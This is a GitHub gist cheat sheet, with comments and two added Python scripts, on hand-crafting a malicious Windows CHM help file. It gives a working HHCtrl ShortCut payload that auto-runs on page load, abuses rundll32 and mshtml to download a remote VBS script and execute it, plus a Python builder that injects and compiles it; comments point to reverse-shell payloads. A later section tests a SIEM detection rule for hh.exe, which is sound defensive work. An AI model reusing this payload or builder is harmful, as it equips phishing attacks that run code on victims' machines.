@mgeeky
Created February 6, 2018 13:52
Cheat sheet describing how to create a malicious CHM file by hand (another approach is to use Nishang's Out-CHM script).

Procedure for generating Malicious CHM file

  • Step 0: Download and install Microsoft HTML Help Workshop and Documentation (it ships the hhc.exe compiler used in Step 4).
  • Step 1: Obtain a valid CHM file and unpack it using 7-Zip.
  • Step 2: Find an entry-point HTML file within the "docs" directory and insert the following code into its <body> section. The classid is the HTML Help ActiveX control (HHCtrl); its ShortCut command launches the program given in Item1 (format: window,program,parameters) once the object is clicked, which the trailing script does automatically on page load:
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
  <PARAM name="Command" value="ShortCut">
  <PARAM name="Button" value="Bitmap::shortcut">
  <PARAM name="Item1" value=',cmd.exe,/c copy /Y C:\Windows\system32\rundll32.exe %TEMP%\out.exe > nul && %TEMP%\out.exe javascript:"\..\mshtml RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://127.0.0.1:8000/test.vbs",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im out.exe",0,true);}'>
  <PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
  x.Click();
</SCRIPT>
  • Step 3: Prepare a Project.hhp file (an HTML Help project file) with contents like the below:
[OPTIONS]
Contents file=<PATH-TO-UNPACKED-CHM-DIRECTORY>\Table of Contents.hhc
[FILES]
<PATH-TO-UNPACKED-CHM-DIRECTORY>\docs\Malicious-File.htm

Add every file needed by that CHM to the [FILES] section, including the modified malicious HTM file.

  • Step 4: Compile the project within the CHM directory using the hhc.exe compiler (note that hhc.exe exits with code 1 on success and 0 on failure, so check that the .chm was actually created rather than relying on the exit code):
<PATH-TO-UNPACKED-CHM-DIRECTORY> "C:\Program Files (x86)\HTML Help Workshop\hhc.exe" Project.hhp
Microsoft HTML Help Compiler 4.74.8702

Compiling <PATH-TO-UNPACKED-CHM-DIRECTORY>\Project.chm


Compile time: 0 minutes, 1 second
353     Topics
7,208   Local links
187     Internet links
2       Graphics


Created <PATH-TO-UNPACKED-CHM-DIRECTORY>\Project.chm, 817,791 bytes
Compression decreased file by 2,091,702 bytes.
  • Step 5: PROFIT.
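
The procedure in Steps 2 to 4 can be scripted. The following is an added example for this page, not code from the gist author or from Nishang: it renders the ShortCut OBJECT for any program and argument string, injects it after the page's <body> tag, writes the .hhp project and calls hhc.exe, treating the compiler's inverted exit code correctly. The source directory, entry-point page and hhc.exe location are assumptions and are labelled as such in the code.

```python
"""Automates Steps 2 to 4 above: inject the HHCtrl ShortCut object into an
entry-point page, write the .hhp project file and compile it with hhc.exe.
Added example for this page, not the gist author's code; every path here is
an assumption and must be adjusted to the unpacked CHM being used."""
import ntpath
import os
import re
import subprocess

HHCTRL_CLSID = "clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"  # HTML Help ActiveX control
HHC_EXE = r"C:\Program Files (x86)\HTML Help Workshop\hhc.exe"  # assumption: default install path


def shortcut_object(program: str, args: str, obj_id: str = "x") -> str:
    """Render the <OBJECT> block from Step 2 for an arbitrary program and
    argument string, followed by the script that clicks it on page load.

    Item1 is "window,program,parameters" (window left empty as in the gist);
    Item2 is "message,wParam,lParam", 273 being WM_COMMAND (0x111). The
    Item1 attribute is single-quoted because payloads usually carry double
    quotes, so only single quotes in the value need escaping.
    """
    item1 = f",{program},{args}".replace("'", "&#39;")
    return (
        f'<OBJECT id={obj_id} classid="{HHCTRL_CLSID}" width=1 height=1>\n'
        '  <PARAM name="Command" value="ShortCut">\n'
        '  <PARAM name="Button" value="Bitmap::shortcut">\n'
        f"  <PARAM name=\"Item1\" value='{item1}'>\n"
        '  <PARAM name="Item2" value="273,1,1">\n'
        "</OBJECT>\n"
        f"<SCRIPT>\n  {obj_id}.Click();\n</SCRIPT>\n"
    )


def inject_into_body(page_html: str, snippet: str) -> str:
    """Insert the snippet right after the opening <body ...> tag (any case)."""
    m = re.search(r"<body\b[^>]*>", page_html, flags=re.IGNORECASE)
    if m is None:
        raise ValueError("entry-point page has no <body> tag")
    return page_html[: m.end()] + "\n" + snippet + page_html[m.end():]


def write_hhp(src_dir: str, contents_file: str, files, default_topic: str,
              compiled_file: str = "Project.chm") -> str:
    """Render the .hhp text from Step 3. ntpath is used so the paths come out
    in Windows form even when this runs on a non-Windows box.

    "Default topic" (relative to the project directory) is not in the gist's
    minimal project; it makes the page carrying the OBJECT the one hh.exe
    opens first, so the shortcut fires without the user navigating to it.
    """
    lines = [
        "[OPTIONS]",
        f"Compiled file={compiled_file}",
        f"Contents file={ntpath.join(src_dir, contents_file)}",
        f"Default topic={default_topic}",
        "",
        "[FILES]",
    ]
    lines += [ntpath.join(src_dir, f) for f in files]  # every file the CHM needs, modified page included
    return "\n".join(lines) + "\n"


def compile_chm(hhp_path: str, compiled_file: str = "Project.chm",
                hhc_exe: str = HHC_EXE):
    """Run hhc.exe on the project. hhc.exe exits 1 on success and 0 on
    failure, the reverse of the usual convention, so success is judged by
    the compiled file appearing, not by the return code."""
    project_dir = os.path.dirname(os.path.abspath(hhp_path))
    proc = subprocess.run([hhc_exe, hhp_path], cwd=project_dir,
                          capture_output=True, text=True)
    return os.path.exists(os.path.join(project_dir, compiled_file)), proc.stdout


if __name__ == "__main__":
    src_dir = r"C:\work\unpacked-chm"                   # assumption: where 7-Zip extracted the CHM
    entry = "docs\\index.htm"                            # assumption: the entry-point page
    page = os.path.join(src_dir, entry)
    with open(page, encoding="latin-1") as fh:
        html = fh.read()
    snippet = shortcut_object("cmd.exe", "/c calc.exe")  # benign stand-in for the gist's payload
    with open(page, "w", encoding="latin-1") as fh:
        fh.write(inject_into_body(html, snippet))
    hhp = os.path.join(src_dir, "Project.hhp")
    with open(hhp, "w") as fh:
        fh.write(write_hhp(src_dir, "Table of Contents.hhc", [entry], entry))
    ok, log = compile_chm(hhp)
    print(log)
    print("compiled" if ok else "compile failed")
```

The program and arguments passed to shortcut_object are what end up in Item1, so the gist's rundll32/mshtml chain can be dropped in unchanged; the calc.exe stand-in in the driver is only there so the build can be checked without a second-stage server.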
@clubby789

Sorry, which part is the bit to be edited to control what's executed? I assume most of the commands are setting it up.

@cyberblackhole

Where is the test.vbs file? Can you also post its content? I assume this is incomplete without it.

@mgeeky (Author) commented Nov 26, 2019

This was only a demonstration of where to put your command. You can have any sort of VBS, ps1, or js script there really. For the simplest example, generate one yourself using publicly available toolkits such as msfvenom.

@Jackson-Pollock

Can someone please suggest a .chm payload where hh.exe will make a network connection (this is a SIEM rule test requirement)? I tried this and Out-CHM.ps1 to create a reverse shell payload with powershell/nc.exe, but that doesn't meet the requirement of a network connection by hh.exe.

This is to meet the ELK SIEM rule query:

sequence by process.entity_id [process where process.name : "hh.exe" and event.type == "start"] [network where process.name : "hh.exe" and not cidrmatch(destination.ip, "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

@bcoles commented Oct 29, 2022

> Can someone please suggest a .chm payload where hh.exe will make a network connection (this is a SIEM rule test requirement)? I tried this and Out-CHM.ps1 to create a reverse shell payload with powershell/nc.exe, but that doesn't meet the requirement of a network connection by hh.exe.
>
> This is to meet the ELK SIEM rule query:
> sequence by process.entity_id [process where process.name : "hh.exe" and event.type == "start"] [network where process.name : "hh.exe" and not cidrmatch(destination.ip, "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

A malicious CHM file is not required for your use case. hh.exe supports a URL as a command line argument.

hh.exe http://example.com
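
The EQL rule quoted in the thread fires only when hh.exe itself is the process opening the socket, which is why a CHM whose payload spawns powershell.exe or nc.exe never matches while `hh.exe http://example.com` does. The following is an added example, not from the gist or either commenter: it re-implements that sequence in plain Python and runs it over constructed ECS-shaped events covering the three cases (hh.exe connecting out, a child process connecting out, hh.exe connecting to an internal address). The event records and IP addresses are constructed, not real telemetry.

```python
"""Offline re-implementation of the EQL sequence quoted above, so its logic
can be exercised against sample telemetry: for one process.entity_id, an
hh.exe process start followed by an hh.exe network connection to an address
outside the three RFC 1918 ranges. Added example, not from the gist or its
commenters; the events below are constructed, not real logs."""
import ipaddress

PRIVATE_RANGES = [ipaddress.ip_network(c)
                  for c in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def cidrmatch(ip: str, networks=PRIVATE_RANGES) -> bool:
    """Equivalent of EQL cidrmatch(): True if ip lies in any of the networks."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in networks)


def hh_exe_external_connections(events):
    """Walk time-ordered ECS-shaped events and return (entity_id, destination_ip)
    for every hh.exe network event preceded by an hh.exe start of the same
    entity. Like the EQL ':' operator, the process-name match ignores case."""
    started = set()
    hits = []
    for ev in events:
        if ev.get("process.name", "").lower() != "hh.exe":
            continue
        eid = ev["process.entity_id"]
        if ev["event.category"] == "process" and ev.get("event.type") == "start":
            started.add(eid)
        elif ev["event.category"] == "network" and eid in started:
            if not cidrmatch(ev["destination.ip"]):
                hits.append((eid, ev["destination.ip"]))
    return hits


# Constructed sample telemetry (not real logs). Three stories:
#  A: hh.exe http://example.com -> hh.exe itself connects out          (matches)
#  B: hh.exe opens a CHM whose payload spawns powershell that connects out
#     (the commenter's reverse-shell case: no hh.exe network event, no match)
#  C: hh.exe fetching from an internal 10.x host (excluded by cidrmatch)
SAMPLE_EVENTS = [
    {"process.entity_id": "A", "process.name": "hh.exe", "event.category": "process",
     "event.type": "start", "process.command_line": "hh.exe http://example.com"},
    {"process.entity_id": "B", "process.name": "HH.EXE", "event.category": "process",
     "event.type": "start", "process.command_line": "hh.exe C:\\Users\\u\\help.chm"},
    {"process.entity_id": "B1", "process.name": "powershell.exe", "event.category": "process",
     "event.type": "start", "process.parent.entity_id": "B"},
    {"process.entity_id": "B1", "process.name": "powershell.exe", "event.category": "network",
     "destination.ip": "203.0.113.10", "destination.port": 4444},
    {"process.entity_id": "C", "process.name": "hh.exe", "event.category": "process",
     "event.type": "start"},
    {"process.entity_id": "C", "process.name": "hh.exe", "event.category": "network",
     "destination.ip": "10.20.30.40", "destination.port": 80},
    {"process.entity_id": "A", "process.name": "hh.exe", "event.category": "network",
     "destination.ip": "93.184.216.34", "destination.port": 80},
]

if __name__ == "__main__":
    for eid, dst in hh_exe_external_connections(SAMPLE_EVENTS):
        print(f"hh.exe ({eid}) connected to non-private address {dst}")
```

To test the rule itself against a real endpoint, the `hh.exe http://example.com` invocation is sufficient, as noted above; the child-process case (story B) is what a process-tree rule keyed on process.parent.name would need instead.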
